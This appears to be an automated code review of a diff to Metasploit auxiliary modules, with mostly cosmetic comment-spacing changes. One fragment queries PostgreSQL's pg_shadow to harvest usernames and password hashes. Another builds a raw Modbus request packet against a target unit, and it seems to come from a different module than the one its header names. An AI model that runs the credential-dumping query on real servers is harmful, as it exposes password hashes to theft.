res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
|
||||
|
||||
service_data = {
|
||||
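Review bot: The trailing positional `false` in `postgres_query('SELECT usename, passwd FROM pg_shadow',false)` is unexplained at the call site, and the same pattern appears in smart_query (hunk @-94); I cannot tell from this hunk what it toggles, so a short comment naming it (or a keyword argument, if postgres_query accepts one) would help the reader. The corrected comment could also record that pg_shadow is readable only by superusers, which is why the error branches below matter. run_host continues past the hunk.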
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
# Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
print_error("A Connection Error occured")
|
||||
|
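Review bot: `print_error("A Connection Error occured")` misspells "occurred" in a user-facing message, and the same string appears again in smart_query (hunk @-94); since this commit corrects wording, both are worth fixing in the same pass: `print_error("A Connection Error occurred")`. `res.keys[0]` reads more naturally as `res.keys.first`. The case statement continues past the hunk.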
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def smart_query(query_string)
|
||||
res = postgres_query(query_string,false)
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
# Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
print_error("A Connection Error occured")
|
||||
|
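Review bot: `def smart_query(query_string)` has no doc block even though this commit is correcting YARD comments, and its error handling duplicates the `case res.keys[0]` block in run_host (hunk @-55). A header such as `# Runs query_string through postgres_query and reports connection/auth failures` / `# @param query_string [String] SQL to execute` would document the contract; the return value is not visible here, so a `@return` tag would need confirming against the rest of the method. The method continues past the hunk.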
@ -71,7 +71,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# Reporting
|
||||
|
||||
report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# Logout
|
||||
|
||||
postgres_logout
|
||||
|
||||
rescue Rex::ConnectionError
|
||||
|
@ -108,8 +108,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# For debugging only.
|
||||
#rescue ::Exception
|
||||
# print_error("#{$!}")
|
||||
# return :abort
|
||||
# print_error("#{$!}")
|
||||
#return :abort
|
||||
|
||||
ensure
|
||||
disconnect()
|
||||
|
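Review bot: The commented-out `#rescue ::Exception` block is dead code that this commit only re-spaces; if it is ever re-enabled as written it would swallow SystemExit, SignalException and Interrupt, so it is safer either to delete it or to leave it as `# rescue => e` (StandardError) with `# print_error(e.message)`. `disconnect()` in the ensure can drop the empty parentheses per Ruby style. The begin block this belongs to starts before the hunk.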
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
#read input register=func:04, register 1
|
||||
# read input register=func:04, register 1
|
||||
sploit="\x21\x00\x00\x00\x00\x06\x01\x04\x00\x01\x00\x00"
|
||||
sploit[6] = [datastore['UNIT_ID']].pack("C")
|
||||
connect()
|
||||
|
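Review bot: `sploit[6] = [datastore['UNIT_ID']].pack("C")` silently truncates the option to its low 8 bits (`[300].pack("C")` yields `","`), so an out-of-range UNIT_ID is sent as a different unit with no warning; unless the option is declared with a 0..255 range elsewhere in the file, a check such as `fail_with(Failure::BadConfig, 'UNIT_ID must be 0-255') unless (0..255).cover?(datastore['UNIT_ID'])` before the assignment would make that explicit. The comment `# read input register=func:04, register 1` could also name the byte layout the index refers to, since offset 6 is the MBAP unit identifier: `# MBAP: txid(2) proto(2) len(2) unit(1); PDU: func 0x04, start 0x0001, quantity`. run_host continues past the hunk.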